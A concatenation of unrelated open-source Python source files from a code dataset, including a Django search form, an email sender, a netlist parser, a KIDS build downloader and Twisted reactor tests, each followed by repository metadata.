raise CommandError("Domain already exists.")
else:
self.stdout.write("%s created!\n" % domain)
self.stdout.flush()
| agpl-3.0 | 7,878,014,791,629,743,000 | 33.875 | 80 | 0.688172 | false |
Joev-/Streaman | streaman/stream.py | 1 | 3561 | """
streaman.stream
---------------
Provides the base `Stream` and `Channel` classes which must be overridden by
implemented services.
"""
import time
import os
try:
import cPickle as pickle
except ImportError:
import pickle
from types import MethodType
from streaman.common import *
class Stream(object):
""" A raw `Stream` object. Stores a Name, URI and Service ID for a stream. """
def __init__(self, service, name, uri, url):
self.service = service
self.name = name
self.uri = uri
self.url = url
self.status = STATUS_OFFLINE
self.last_update = int(time.time())
def __repr__(self):
return "<Stream: ({0}) {1}>".format(SERVICE_NAME[self.service], self.name)
def __getstate__(self):
"""
Overriden for pickling purposes. Only the attributes
of the underlying `Stream` class need to be pickled.
"""
to_pickle = ["service", "name", "uri", "url"]
d = dict()
for k, v in self.__dict__.items():
if k in to_pickle:
d[k]=v
return d
def __setstate__(self, d):
"""
Overriden for pickling purposes.
Initialises null values for attributes that should exist.
"""
d["channel"] = None
d["status"] = STATUS_OFFLINE
d["last_update"] = 0
# Most streams will have some sort of game attribute.
d["game"] = ""
self.__dict__.update(d)
def update(self, updateModel, index):
"""
This method should be used to update the Stream with new data.
At the least it informs the model that the data at the given index
has been updated. The updateModel method is a method inside the
Model class, usually `notify_stream_updated`
"""
updateModel(index)
self.last_update = int(time.time())
@staticmethod
def generate_uri(stream_name):
"""
Takes a stream name and returns a URI.
Must be overridden and implemented for each streaming service.
"""
raise NotImplementedError("Method must be overridden")
@staticmethod
def generate_url(stream_name):
"""
Takes a stream name and returns a URL.
Must be overridden and implemented for each streaming service.
A URL differs from a URI in that it is the hyperlink to the stream web page.
This will be used when user's click on the "View on [service]" button.
"""
raise NotImplementedError("Method must be overridden")
@staticmethod
def is_valid(stream_uri):
"""
Ensures a `Stream` is valid on the service.
Must be overridden and implemented correctly for each streaming service.
"""
raise NotImplementedError("Method must be overridden")
def get_icon(self):
""" Returns a valid resource URI for to an icon. Must be overridden."""
raise NotImplementedError("Method must be overridden")
@property
def online(self):
return self.status
def update_status(self, status):
self.status = status
def check_status(self):
""" Uses `self.uri` to check the status of the stream. """
pass
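    # A service-specific subclass is expected to override the static methods
    # above; a minimal hypothetical sketch (service and URLs are assumptions):
    #
    #   class ExampleStream(Stream):
    #       @staticmethod
    #       def generate_uri(stream_name):
    #           return 'https://api.example.tv/streams/%s' % stream_name
    #       @staticmethod
    #       def generate_url(stream_name):
    #           return 'https://example.tv/%s' % stream_name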
class Channel(object):
""" Most streams will contain a `Channel` with more information. """
def __init__(self):
self.name = ""
self.display_name = ""
self.banner = ""
self.logo = ""
def __repr__(self):
return "<Channel: {0}>".format(self.name)
| mit | -3,287,934,114,056,025,600 | 28.92437 | 84 | 0.596462 | false |
Alberto-Beralix/Beralix | i386-squashfs-root/usr/share/pyshared/ubuntuone-client/ubuntuone/status/messaging.py | 1 | 1398 | # ubuntuone.status.messaging - Messages to the user
#
# Author: Eric Casteleijn <[email protected]>
#
# Copyright 2011 Canonical Ltd.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
"""Module that defines the interfaces for messaging the end user."""
from abc import ABCMeta, abstractmethod
APPLICATION_NAME = 'Ubuntu One Client'
class AbstractMessaging(object):
"""Abstract Base Class for notification implementations."""
__metaclass__ = ABCMeta
# pylint: disable=R0913
@abstractmethod
def show_message(self, sender, callback=None, message_time=None,
message_count=None, icon=None):
"""Show a message in the messaging menu."""
# pylint: enable=R0913
@abstractmethod
def update_count(self, sender, add_count):
"""Update the count for an existing indicator."""
| gpl-3.0 | -7,006,785,282,109,029,000 | 34.846154 | 75 | 0.726037 | false |
RENCI/xDCIShare | hs_core/discovery_form.py | 1 | 4927 | from haystack.forms import FacetedSearchForm
from haystack.query import SQ, SearchQuerySet
from crispy_forms.layout import *
from crispy_forms.bootstrap import *
from django import forms
class DiscoveryForm(FacetedSearchForm):
    NElat = forms.CharField(widget=forms.HiddenInput(), required=False)
    NElng = forms.CharField(widget=forms.HiddenInput(), required=False)
    SWlat = forms.CharField(widget=forms.HiddenInput(), required=False)
    SWlng = forms.CharField(widget=forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
def search(self):
if not self.cleaned_data.get('q'):
sqs = self.searchqueryset.filter(discoverable=True).filter(is_replaced_by=False)
else:
sqs = super(FacetedSearchForm, self).search().filter(discoverable=True).filter(is_replaced_by=False)
geo_sq = SQ()
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq.add(SQ(coverage_east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq.add(SQ(coverage_east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(coverage_east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
geo_sq.add(SQ(coverage_north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(coverage_north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq:
sqs = sqs.filter(geo_sq)
# Check to see if a start_date was chosen.
if self.cleaned_data['start_date']:
sqs = sqs.filter(coverage_start_date__gte=self.cleaned_data['start_date'])
# Check to see if an end_date was chosen.
if self.cleaned_data['end_date']:
sqs = sqs.filter(coverage_end_date__lte=self.cleaned_data['end_date'])
author_sq = SQ()
subjects_sq = SQ()
resource_sq = SQ()
public_sq = SQ()
owner_sq = SQ()
discoverable_sq = SQ()
published_sq = SQ()
variable_sq = SQ()
sample_medium_sq = SQ()
units_name_sq = SQ()
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
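        # each selected facet arrives as a single 'field:value' string,
        # e.g. 'subjects:hydrology' (the value here is an assumed example)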
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
if value:
if "creators" in field:
author_sq.add(SQ(creators=sqs.query.clean(value)), SQ.OR)
elif "subjects" in field:
subjects_sq.add(SQ(subjects=sqs.query.clean(value)), SQ.OR)
elif "resource_type" in field:
resource_sq.add(SQ(resource_type=sqs.query.clean(value)), SQ.OR)
elif "public" in field:
public_sq.add(SQ(public=sqs.query.clean(value)), SQ.OR)
elif "owners_names" in field:
owner_sq.add(SQ(owners_names=sqs.query.clean(value)), SQ.OR)
elif "discoverable" in field:
discoverable_sq.add(SQ(discoverable=sqs.query.clean(value)), SQ.OR)
elif "published" in field:
published_sq.add(SQ(published=sqs.query.clean(value)), SQ.OR)
elif 'variable_names' in field:
variable_sq.add(SQ(variable_names=sqs.query.clean(value)), SQ.OR)
elif 'sample_mediums' in field:
sample_medium_sq.add(SQ(sample_mediums=sqs.query.clean(value)), SQ.OR)
elif 'units_names' in field:
units_name_sq.add(SQ(units_names=sqs.query.clean(value)), SQ.OR)
else:
continue
if author_sq:
sqs = sqs.filter(author_sq)
if subjects_sq:
sqs = sqs.filter(subjects_sq)
if resource_sq:
sqs = sqs.filter(resource_sq)
if public_sq:
sqs = sqs.filter(public_sq)
if owner_sq:
sqs = sqs.filter(owner_sq)
if discoverable_sq:
sqs = sqs.filter(discoverable_sq)
if published_sq:
sqs = sqs.filter(published_sq)
if variable_sq:
sqs = sqs.filter(variable_sq)
if sample_medium_sq:
sqs = sqs.filter(sample_medium_sq)
if units_name_sq:
sqs = sqs.filter(units_name_sq)
return sqs | bsd-3-clause | -1,619,511,691,017,527,800 | 39.393443 | 112 | 0.574995 | false |
thinksabin/lazy-devops | S3 bucket Maker/Mailer.py | 1 | 1471 |
import datetime
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from smtplib import SMTP
class Mailer():
smtp_server = ''
smtp_username = ''
smtp_password = ''
smtp_port = '587'
from_add = "[email protected]"
def __init__(self, receiver, subject, body, filepath, filename):
self.receiver = receiver
self.subject = subject
self.body = body
self.filepath = filepath
self.filename = filename
self.msg = MIMEMultipart('alternative')
def attach_attachment(self):
        part = MIMEApplication(open(self.filepath, "rb").read())
        part.add_header('Content-Disposition', 'attachment', filename=self.filename)
        self.msg.attach(part)
def send_mail(self):
self.msg['Subject'] = "Your S3 Details"
self.msg['From'] = self.from_add
self.msg['To'] = self.receiver
# text = "Please find the attachment for the s3 bucket details"
part1 = MIMEText(self.body, 'plain')
self.msg.attach(part1)
mail = smtplib.SMTP(host = self.smtp_server, port = self.smtp_port, timeout = 10)
mail.set_debuglevel(10)
mail.starttls()
mail.ehlo()
mail.login(self.smtp_username,self.smtp_password)
mail.sendmail(self.from_add, self.receiver, self.msg.as_string())
mail.quit()
| apache-2.0 | 7,089,824,654,200,791,000 | 29.020408 | 89 | 0.639701 | false |
ZeitOnline/zeit.connector | src/zeit/connector/tests/test_cache.py | 1 | 3342 | # coding: utf8
import BTrees
import StringIO
import ZODB
import os
import threading
import transaction
import zeit.connector.cache
import zeit.connector.testing
import zope.app.testing.functional
class TestResourceCache(zope.app.testing.functional.FunctionalTestCase):
layer = zeit.connector.testing.zope_connector_layer
def setUp(self):
super(TestResourceCache, self).setUp()
self.cache = zeit.connector.cache.ResourceCache()
self.getRootFolder()['cache'] = self.cache
self.properties1 = {('getetag', 'DAV:'): 'etag1'}
self.properties2 = {('getetag', 'DAV:'): 'etag2'}
self.uniqueId = u'föö'
self.key = zeit.connector.cache.get_storage_key(self.uniqueId)
self.BUFFER_SIZE = zeit.connector.cache.Body.BUFFER_SIZE
def test_etag_migration(self):
self.cache._etags = BTrees.family64.OO.BTree()
self.cache._etags[self.key] = 'etag1'
data = zeit.connector.cache.SlottedStringRef('data')
self.cache._data[self.key] = data
self.assertEquals(
'data',
self.cache.getData(self.uniqueId, self.properties1).read())
del self.cache._etags[self.key]
self.assertRaises(
KeyError, self.cache.getData, self.uniqueId, self.properties1)
del self.cache._etags
self.assertRaises(
KeyError, self.cache.getData, self.uniqueId, self.properties1)
def test_missing_blob_file(self):
        data1 = StringIO.StringIO(self.BUFFER_SIZE * 2 * 'x')
        data2 = StringIO.StringIO(self.BUFFER_SIZE * 2 * 'y')
self.cache.setData(self.uniqueId, self.properties1, data1)
transaction.commit()
body = self.cache._data[self.key]
os.remove(body.data.committed())
del body.data._p_changed # Invalidate, thus force reload
self.assertRaises(KeyError,
self.cache.getData, self.uniqueId, self.properties1)
self.cache.setData(self.uniqueId, self.properties2, data2)
self.assertEquals(
data2.getvalue(),
self.cache.getData(self.uniqueId, self.properties2).read())
def test_missing_blob_file_with_legacy_data(self):
data = ZODB.blob.Blob()
data.open('w').write('ablob')
self.cache._data[self.key] = data
self.cache._etags = BTrees.family64.OO.BTree()
self.cache._etags[self.key] = 'etag1'
transaction.commit()
os.remove(data.committed())
del data._p_changed
self.assertRaises(KeyError,
self.cache.getData, self.uniqueId, self.properties1)
data2 = StringIO.StringIO(self.BUFFER_SIZE * 2 * 'y')
self.cache.setData(self.uniqueId, self.properties2, data2)
self.assertEquals(
data2.getvalue(),
self.cache.getData(self.uniqueId, self.properties2).read())
def test_blob_conflict_resolution(self):
size = zeit.connector.cache.Body.BUFFER_SIZE
body = StringIO.StringIO('body' * size)
def store():
transaction.abort()
self.cache.setData(self.uniqueId, self.properties1, body)
transaction.commit()
t1 = threading.Thread(target=store)
t2 = threading.Thread(target=store)
t1.start()
t2.start()
t1.join()
t2.join()
| bsd-3-clause | -8,179,706,775,883,581,000 | 37.390805 | 78 | 0.631437 | false |
mph-/lcapy | lcapy/parser.py | 1 | 8849 | """This module performs parsing of SPICE-like netlists. It uses a
custom parser rather than lex/yacc to give better error messages.
Copyright 2015--2020 Michael Hayes, UCECE
"""
import re
# Could use a script to generate parser and parsing tables if speed
# was important.
def split(s, delimiters):
"""Split string by specified delimiters but not if a delimiter is
within curly brackets {} or ""."""
parts = []
current = []
close_bracket = ''
bracket_stack = []
for c in (s + delimiters[0]):
if c in delimiters and len(bracket_stack) == 0:
if len(current) > 0:
parts.append(''.join(current))
current = []
else:
if c == close_bracket:
close_bracket = bracket_stack.pop()
elif c == '{':
bracket_stack.append(close_bracket)
close_bracket = '}'
elif c == '"':
bracket_stack.append(close_bracket)
close_bracket = '"'
current.append(c)
if close_bracket != '':
raise ValueError('Missing %s in %s' % (close_bracket, s))
return parts
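
# Illustration (hypothetical input, not taken from any grammar):
#   split('R1 1 2 {a b}', ' ')  ->  ['R1', '1', '2', '{a b}']
# The space inside the braces is protected, so '{a b}' survives as one field.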
class Param(object):
def __init__(self, name, base, comment):
self.name = name
self.base = base
self.comment = comment
self.baseclass = None
def is_valid(self, string):
if self.baseclass is None:
return True
return self.baseclass.is_valid(string)
class Rule(object):
def __init__(self, cpt_type, classname, params, comment, pos):
self.type = cpt_type
self.classname = classname
self.params = params
self.comment = comment
self.pos = pos
def __repr__(self):
return self.type + 'name ' + ' '.join(self.params)
def syntax_error(self, error, string):
raise ValueError('Syntax error: %s when parsing %s\nExpected format: %s' % (error, string, repr(self)))
def process(self, paramdict, string, fields, name, namespace):
params = self.params
if len(fields) > len(params):
extra = ''
if '(' in string:
extra = ' (perhaps enclose expressions with parentheses in {})'
self.syntax_error('Too many args' + extra, string)
nodes = []
args = []
for m, param in enumerate(params):
if m >= len(fields):
# Optional argument
if param[0] == '[':
break
self.syntax_error('Missing arg %s' % param, string)
if param[0] == '[':
param = param[1:-1]
field = fields[m]
if paramdict[param].base in ('pin', 'node'):
if field[0] == '.':
# Note, name contains namespace
field = name + field
else:
field = namespace + field
nodes.append(field)
elif paramdict[param].base != 'keyword':
args.append(field)
return tuple(nodes), args
class Parser(object):
def __init__(self, cpts, grammar, allow_anon=False):
"""cpts is a module containing a class for each component
grammar is a module defining the syntax of a netlist"""
# A string defining the syntax for a netlist
rules = grammar.rules
# A string defining parameters
params = grammar.params
# A string defining delimiter characters
self.delimiters = grammar.delimiters
# A string defining comment characters
self.comments = grammar.comments
self.allow_anon = allow_anon
self.cpts = cpts
self.paramdict = {}
self.ruledict = {}
for param in params.split('\n'):
self._add_param(param)
for rule in rules.split('\n'):
self._add_rule(rule)
cpts = sorted(self.ruledict.keys(), key=len, reverse=True)
# The symbol name must be a valid Sympy symbol name so
# it cannot include symbols such as + and -.
        self.cpt_pattern = re.compile(r"(%s)([#_\w'?]+)?" % '|'.join(cpts))
def _add_param(self, string):
if string == '':
return
fields = string.split(':')
paramname = fields[0]
fields = fields[1].split(';', 1)
parambase = fields[0].strip()
comment = fields[1].strip()
self.paramdict[paramname] = Param(paramname, parambase, comment)
def _add_rule(self, string):
if string == '':
return
fields = string.split(':')
cpt_classname = fields[0]
fields = fields[1].split(';', 1)
string = fields[0].strip()
comment = fields[1].strip()
fields = string.split(' ')
params = fields[1:]
# Skip the name part in the rule, e.g., only consider D from Dname.
cpt_type = fields[0][0:-4]
pos = None
for m, param in enumerate(params):
if param[0] == '[':
param = param[1:-1]
if param not in self.paramdict:
raise ValueError('Unknown parameter %s for %s' % (param, string))
if pos is None and self.paramdict[param].base == 'keyword':
pos = m
if cpt_type not in self.ruledict:
self.ruledict[cpt_type] = ()
self.ruledict[cpt_type] += (Rule(cpt_type, cpt_classname,
params, comment, pos), )
def parse(self, string, namespace='', parent=None):
"""Parse string and create object"""
directive = False
net = string.strip()
if net == '':
directive = True
elif net[0] in self.comments:
directive = True
elif net[0] == ';':
directive = True
elif net[0] == '.':
directive = True
if directive:
cpt_type = 'XX'
cpt_id = ''
name = 'XX'
name += parent._make_anon(cpt_type)
defname = namespace + cpt_type + cpt_id
if string.startswith(';') and not string.startswith(';;'):
opts_string = string[1:]
else:
opts_string = ''
return self.cpts.make('XX', parent, '', defname, name,
cpt_type, cpt_id, string, opts_string, (), '')
net = namespace + net
parts = net.split(';', 1)
fields = split(parts[0], self.delimiters)
# Strip {} and "".
for m, field in enumerate(fields):
if field[0] in '{"':
fields[m] = fields[m][1:-1]
name = fields.pop(0)
parts = name.split('.')
namespace = ''
if len(parts) > 1:
namespace = '.'.join(parts[0:-1]) + '.'
name = parts[-1]
match = self.cpt_pattern.match(name)
if match is None:
raise ValueError('Unknown component %s while parsing "%s"' % (name, net))
groups = match.groups()
cpt_type, cpt_id = groups[0], groups[1]
if cpt_id is None:
cpt_id = ''
        # This is the hackiest aspect of this parser, where we
# choose the rule pattern based on a keyword. If the
# keyword is not present, default to first rule pattern.
# Perhaps a factory should sort this out?
rule = self.ruledict[cpt_type][0]
keyword = ''
for rule1 in self.ruledict[cpt_type]:
pos = rule1.pos
if pos is None:
continue
if len(fields) > pos and fields[pos].lower() == rule1.params[pos]:
rule = rule1
keyword = rule1.params[pos]
break
defname = namespace + cpt_type + cpt_id
name = defname
        if (cpt_id == '' and parent is not None
                and (cpt_type in ('A', 'W', 'O', 'P') or self.allow_anon)):
name += parent._make_anon(cpt_type)
elif cpt_id == '?':
# Automatically name cpts to ensure they are unique
name = name[:-1] + parent._make_anon(cpt_type)
nodes, args = rule.process(self.paramdict, net, fields, name,
namespace)
parts = net.split(';', 1)
opts_string = parts[1].strip() if len(parts) > 1 else ''
keyword = (pos, keyword)
# self.cpts is either the mnacpts or schematic module
return self.cpts.make(rule.classname, parent, namespace,
defname, name, cpt_type, cpt_id, net,
opts_string, tuple(nodes), keyword,
*args)
| lgpl-2.1 | 5,817,020,142,593,945,000 | 30.716846 | 119 | 0.508984 | false |
OSEHRA/VistA | Scripts/ExternalDownloader.py | 1 | 4599 | #---------------------------------------------------------------------------
# Copyright 2013-2019 The Open Source Electronic Health Record Alliance
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#---------------------------------------------------------------------------
from future import standard_library
standard_library.install_aliases()
from builtins import object
import sys
import os
import urllib.request, urllib.parse, urllib.error
from LoggerManager import logger, initConsoleLogging
from ConvertToExternalData import generateExternalDataFileName
from ConvertToExternalData import generateSha1Sum
"""
Download External Data
"""
DEFAULT_EXTERNAL_DOWNLOAD_SITE_URL = "https://code.worldvista.org/content/SHA1"
""" find or download the external KIDS Build file, return the file path """
def obtainKIDSBuildFileBySha1(filePath, sha1Sum, cacheDir):
assert cacheDir and os.path.exists(cacheDir)
rootDir = os.path.dirname(filePath)
externalFileName = generateExternalDataFileName(sha1Sum)
externalFile = os.path.join(rootDir, externalFileName)
logger.info("Checking %s" % externalFile)
if os.path.exists(externalFile):
if generateSha1Sum(externalFile) == sha1Sum:
return (True, externalFile)
else:
os.remove(externalFile)
""" try to find the file in the cache dir """
externalFile = os.path.join(cacheDir, externalFileName.replace('_','/'))
logger.info("Checking %s" % externalFile)
if os.path.exists(externalFile):
if generateSha1Sum(externalFile) == sha1Sum:
return (True, externalFile)
else:
os.remove(externalFile)
""" make sure cacheDir has the right layout """
rootDir = os.path.dirname(externalFile)
if not os.path.exists(rootDir):
os.makedirs(rootDir)
""" download from remote """
extDownloader = ExternalDataDownloader()
logger.info("Downloading from remote link")
result = extDownloader.downloadExternalDataByHash(sha1Sum, externalFile)
if not result:
logger.error("Downloading from remote failed")
if os.path.exists(externalFile):
os.remove(externalFile)
externalFile = None
logger.info("%s, %s" % (result, externalFile))
return (result, externalFile)
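
# Illustrative call (paths and hash are hypothetical): look for the external
# data next to the .sha1 file, then in the cache dir, then download remotely:
#   ok, path = obtainKIDSBuildFileBySha1('/repo/build.KID', sha1sum, '/var/cache/kids')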
class ExternalDataDownloader(object):
def __init__(self, siteUrl=DEFAULT_EXTERNAL_DOWNLOAD_SITE_URL):
self._siteUrl = siteUrl
"""
"""
@staticmethod
def downloadExternalDataDirectly(dwnUrl, fileToSave):
try:
urllib.request.urlretrieve(dwnUrl, fileToSave)
return True
except Exception as ex:
logger.error(ex)
return False
"""
"""
def downloadExternalDataByHash(self, sha1Sum, fileToSave):
dwnUrl = "%s/%s" % (self._siteUrl, sha1Sum)
if not self.downloadExternalDataDirectly(dwnUrl, fileToSave):
return False
""" verify the sha1sum of downloaded file """
sha1SumDwn = generateSha1Sum(fileToSave)
if sha1Sum == sha1SumDwn:
return True
logger.error("sha1Sum mismatch %s:%s" % (sha1Sum, sha1SumDwn))
os.remove(fileToSave)
def main():
  initConsoleLogging()
  # testing obtainKIDSBuildFileBySha1
  logger.info(sys.argv)
  obtainKIDSBuildFileBySha1(sys.argv[1], sys.argv[2], sys.argv[3])
def downloadAllKIDSSha1File(topDir, cacheDir):
from ConvertToExternalData import isValidKIDSBuildSha1Suffix
from ConvertToExternalData import readSha1SumFromSha1File
import shutil
initConsoleLogging()
absCurDir = os.path.abspath(topDir)
for (root, dirs, files) in os.walk(absCurDir):
for f in files:
if not isValidKIDSBuildSha1Suffix(f):
continue
filePath = os.path.join(root, f)
sha1Sum = readSha1SumFromSha1File(filePath)
result, extFilePath = obtainKIDSBuildFileBySha1(filePath, sha1Sum, cacheDir)
if result:
destFile = filePath[:filePath.rfind('.')]
if os.path.exists(destFile) and generateSha1Sum(destFile) == sha1Sum:
logger.info("%s is already current" % destFile)
continue
logger.info("%s => %s" % (extFilePath, destFile))
shutil.copyfile(extFilePath, destFile)
if __name__ == '__main__':
#main()
downloadAllKIDSSha1File(sys.argv[1], sys.argv[2])
| apache-2.0 | 1,417,033,469,209,968,000 | 36.08871 | 82 | 0.702979 | false |
PnCevennes/SaisieChasse | modules/chasse/routes.py | 1 | 2687 | #coding: utf8
from flask import Blueprint, request
import json
from sqlalchemy import select
from server import db
from .models import VLieuTirSynonymes, PlanChasse, SaisonChasse
from ..utils.utilssqlalchemy import json_resp
ltroutes = Blueprint('lieux_tir', __name__)
@ltroutes.route('/', methods=['GET'])
@ltroutes.route('/<int:id>', methods=['GET'])
@json_resp
def get_lieutirsyn(id = None):
q = db.session.query(VLieuTirSynonymes)
if request.args.get('code_com') :
print 'code_com', request.args.get('code_com')
q = q.filter_by(code_com = request.args.get('code_com'))
if id:
q = q.filter_by(id=id)
data = q.all()
return [attribut.as_dict() for attribut in data]
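
# Example request (hypothetical mount point for the blueprint):
#   GET /lieux_tir/?code_com=48095  -> JSON list of the matching lieu-dit
# synonyms for that commune, serialised by the @json_resp decorator.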
@ltroutes.route('/communes', methods=['GET'])
@json_resp
def get_communes():
data = db.session \
.query(VLieuTirSynonymes.nom_com, VLieuTirSynonymes.code_com) \
.distinct(VLieuTirSynonymes.nom_com).all()
return [{"value" : attribut.nom_com, "id" : int(attribut.code_com) } for attribut in data]
pcroutes = Blueprint('plan_chasse', __name__)
@pcroutes.route('/bracelet/<int:id>', methods=['GET'])
@json_resp
def get_bracelet_detail(id = None):
data = db.session.query(PlanChasse).filter_by(id=id).first()
return data.as_dict()
@pcroutes.route('/bracelet/<int:id>', methods=['POST', 'PUT'])
def insertupdate_bracelet_detail(id = None):
data = json.loads(request.data)
o = PlanChasse(**data)
db.session.merge(o)
try:
db.session.commit()
        return json.dumps({'success': True, 'message': 'Enregistrement sauvegardé avec succès'}), 200, {'Content-Type': 'application/json'}
except Exception as e:
db.session.rollback()
        return json.dumps({'success': False, 'message': 'Impossible de sauvegarder l\'enregistrement'}), 500, {'Content-Type': 'application/json'}
@pcroutes.route('/auteurs', methods=['GET'])
@json_resp
def get_auteurs():
s1 = select([PlanChasse.auteur_tir]).distinct()
s2 = select([PlanChasse.auteur_constat]).distinct()
q = s1.union(s2).alias('auteurs')
data = db.session.query(q).all()
return [{"auteur_tir" : a }for a in data]
@pcroutes.route('/saison', methods=['GET'])
@json_resp
def get_saison_list():
data = db.session.query(SaisonChasse).all()
return [a.as_dict() for a in data]
@pcroutes.route('/bracelets_list/<int:saison>', methods=['GET'])
@json_resp
def get_bracelet_list(saison = None):
data = db.session \
.query(PlanChasse.id, PlanChasse.no_bracelet) \
.filter_by(fk_saison = saison)\
.distinct().all()
return [{"no_bracelet" : attribut.no_bracelet, "id" : int(attribut.id) } for attribut in data]
| gpl-3.0 | 5,255,791,992,090,212,000 | 31.361446 | 142 | 0.661579 | false |
yehudagale/fuzzyJoiner | old/matcher.py | 1 | 1840 | #using tutorial https://suhas.org/sqlalchemy-tutorial/
from sys import argv
from matcher_functions import *
#establish connection to database
con, meta = connect(argv[1], argv[2], argv[3])
#load pairs from database
aliases = get_aliases(con, meta)
#create dictionaries mapping serial numbers to names and names to serial numbers
num_to_word, word_to_num = create_double_num_dicts(aliases)
#load the buckets from the database; bucket_list is arranged as follows:
#bucket_list[pair_of_buckets][bucket (must be 0 or 1)][name (a single name)][0 for number and 1 for pre-processed name]
bucket_list, bucket_words = load_good_buckets('wordtable1', 'wordtable2', word_to_num, con, meta)
#print out the number of names that are possible to get just based on bucketing:
impossible = get_impossible(aliases, bucket_list, num_to_word)
print("possible matches: " + str(len(aliases) - len(impossible)))
#next make a list to store the outcomes of all our tests:
matches_list = []
#then run our tests
matches_list.append(run_test(lambda x : x.replace(" ", ""), lambda name1, name2 : name1 in name2 or name2 in name1, num_to_word, bucket_list))
matches_list.append(run_test(lambda x : set(x.split()), lambda name1, name2 : name1.issubset(name2) or name2.issubset(name1), num_to_word, bucket_list))
matches_list.append(run_special_test(bucket_list, num_to_word))
#next create a test dictionary relating each item in the first set to k items in the other set
test_dict = make_test_dict(set([]).union(*matches_list), 1000)
#use this dictionary to calculate and print the f-score
print("fscore: " + str(fscore(aliases, test_dict, 1)))
#next export the items we missed
export_missed(aliases, test_dict, con, meta)
#lastly export the items we could not have gotten since they were not in the same bucket:
export_unbucketed(impossible, con, meta) | epl-1.0 | 5,213,486,929,230,568,000 | 62.482759 | 152 | 0.756522 | false |
chiffa/PolyPharma | bioflow/db_importers/hint_importer.py | 2 | 1976 | """
Set of tools to work with HiNT database
"""
from bioflow.bio_db_parsers.proteinRelParsers import parse_hint
from bioflow.configs.main_configs import hint_csv_path
from bioflow.neo4j_db.GraphDeclarator import DatabaseGraph
from bioflow.utils.log_behavior import get_logger
log = get_logger(__name__)
def get_uniprots_for_hint():
"""
Recovers UP Gene names maps to UNIPROT nodes containing them.
:return:
"""
initial_dict = {}
for node in DatabaseGraph.get_all('UNIPROT'):
initial_dict[node['legacyID']] = node.id
for key in list(initial_dict.keys()):
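        # e.g. a legacyID such as 'TP53_HUMAN' (hypothetical) is re-keyed to 'TP53'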
initial_dict[key.split('_')[0]] = initial_dict.pop(key)
return initial_dict
def cross_ref_hint():
"""
Pulls Hint relationships and connects deprecated_reached_uniprots_neo4j_id_list in the database
:return:
"""
relations_dict = parse_hint(hint_csv_path)
uniprot_ref_dict = get_uniprots_for_hint()
processed_nodes = set()
actual_cross_links = 0
breakpoints = 300
size = len(relations_dict)
log.info('Starting inserting HINT for %s primary nodes' % size)
for i, (legacyId, linked_legacyIds) in enumerate(relations_dict.items()):
        if i % breakpoints == 0:
# TODO: [progress bar]
log.info('\t %.2f %%' % (float(i) / float(size) * 100))
        if legacyId in list(uniprot_ref_dict.keys()):
            processed_nodes.add(legacyId)
for linked_legacyId in linked_legacyIds:
if linked_legacyId in list(uniprot_ref_dict.keys()):
actual_cross_links += 1
DatabaseGraph.link(uniprot_ref_dict[legacyId], uniprot_ref_dict[linked_legacyId],
'is_interacting',
{'source': 'HINT',
'parse_type': 'physical_entity_molecular_interaction'})
log.info('HINT Cross-links: %s, HINT processed nodes: %s',
actual_cross_links, len(processed_nodes))
| bsd-3-clause | 8,683,032,263,872,799,000 | 30.870968 | 101 | 0.610324 | false |
biddisco/VTK | ThirdParty/Twisted/twisted/internet/test/test_posixbase.py | 2 | 9701 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.internet.posixbase} and supporting code.
"""
from __future__ import division, absolute_import
from twisted.python.compat import set, _PY3
from twisted.trial.unittest import TestCase
from twisted.internet.defer import Deferred
from twisted.internet.posixbase import PosixReactorBase, _Waker
from twisted.internet.protocol import ServerFactory
skipSockets = None
if _PY3:
skipSockets = "Re-enable when Python 3 port supports AF_UNIX"
else:
try:
from twisted.internet import unix
from twisted.test.test_unix import ClientProto
except ImportError:
skipSockets = "Platform does not support AF_UNIX sockets"
from twisted.internet.tcp import Port
from twisted.internet import reactor
class TrivialReactor(PosixReactorBase):
def __init__(self):
self._readers = {}
self._writers = {}
PosixReactorBase.__init__(self)
def addReader(self, reader):
self._readers[reader] = True
def removeReader(self, reader):
del self._readers[reader]
def addWriter(self, writer):
self._writers[writer] = True
def removeWriter(self, writer):
del self._writers[writer]
class PosixReactorBaseTests(TestCase):
"""
Tests for L{PosixReactorBase}.
"""
def _checkWaker(self, reactor):
self.assertIsInstance(reactor.waker, _Waker)
self.assertIn(reactor.waker, reactor._internalReaders)
self.assertIn(reactor.waker, reactor._readers)
def test_wakerIsInternalReader(self):
"""
When L{PosixReactorBase} is instantiated, it creates a waker and adds
it to its internal readers set.
"""
reactor = TrivialReactor()
self._checkWaker(reactor)
def test_removeAllSkipsInternalReaders(self):
"""
